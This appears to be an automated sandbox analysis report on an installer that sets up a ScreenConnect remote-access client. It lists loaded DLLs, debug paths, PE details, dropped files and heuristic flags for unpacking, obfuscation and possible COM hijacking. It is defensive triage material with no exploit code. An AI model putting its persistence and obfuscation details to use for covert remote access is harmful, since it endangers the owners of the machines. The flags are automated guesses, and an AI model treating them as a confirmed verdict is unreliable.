Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

PE / OLE file has a valid certificate

Source: lat0Kwfbuj.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: lat0Kwfbuj.exe

Static file information: File size 5639944 > 1048576

PE file has a big raw section

Source: lat0Kwfbuj.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600

PE file contains a mix of data directories often seen in goodware

Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lat0Kwfbuj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: lat0Kwfbuj.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: lat0Kwfbuj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: lat0Kwfbuj.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: lat0Kwfbuj.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2245197043.000000000029D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: lat0Kwfbuj.exe, MSI8C55.tmp.3.dr, 488619.msi.3.dr, MSI884C.tmp.3.dr, 48861b.msi.3.dr, MSI888B.tmp.3.dr, setup.msi.0.dr, 48861a.rbs.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: lat0Kwfbuj.exe, MSI805D.tmp.2.dr, 488619.msi.3.dr, 48861b.msi.3.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611213053.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: lat0Kwfbuj.exe

PE file contains a valid data directory to section mapping

Source: lat0Kwfbuj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lat0Kwfbuj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lat0Kwfbuj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lat0Kwfbuj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lat0Kwfbuj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.lat0Kwfbuj.exe.1350000.0.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.0.lat0Kwfbuj.exe.104bcf4.1.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])

PE file contains an invalid checksum

Source: lat0Kwfbuj.exe

Static PE information: real checksum: 0x550b20 should be: 0x56ebd1

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_01276F00 push eax; mov dword ptr [esp], ecx	0_2_01276F11
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_01271817 push esp; ret	0_2_01271821
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055E3A78 pushad ; iretd	0_2_055E3AA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_070277E2 push esp; ret	5_3_070277E9
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_04646B35 push esp; iretd	8_2_04646B39
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_05EE185A push eax; iretd	8_2_05EE1865
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_05EE3F60 pushad ; ret	8_2_05EE3F73
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_05EFBE48 pushad ; retf	8_2_05EFBE49
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E56E9 push esp; ret	9_2_00007FFD340E5703
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E792B push ebx; retf	9_2_00007FFD340E796A
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E7928 push ebx; retf	9_2_00007FFD340E796A
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340F631A pushad ; ret	9_2_00007FFD340F631D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340D7BE9 push cs; ret	9_2_00007FFD340D7BEF
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340D8440 pushad ; ret	9_2_00007FFD340D845D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340B37F0 push eax; retf	10_2_00007FFD340B37FD
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C9848 push cs; iretd	10_2_00007FFD343C9C2F
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C99AC push cs; iretd	10_2_00007FFD343C9C2F
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD343C27A1 push ss; iretd	10_2_00007FFD343C27A8

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Possible COM Object hijacking

Source: c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.windowscredentialprovider.dll

COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-a44d-4392d823459f}\inprocserver32

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI888B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
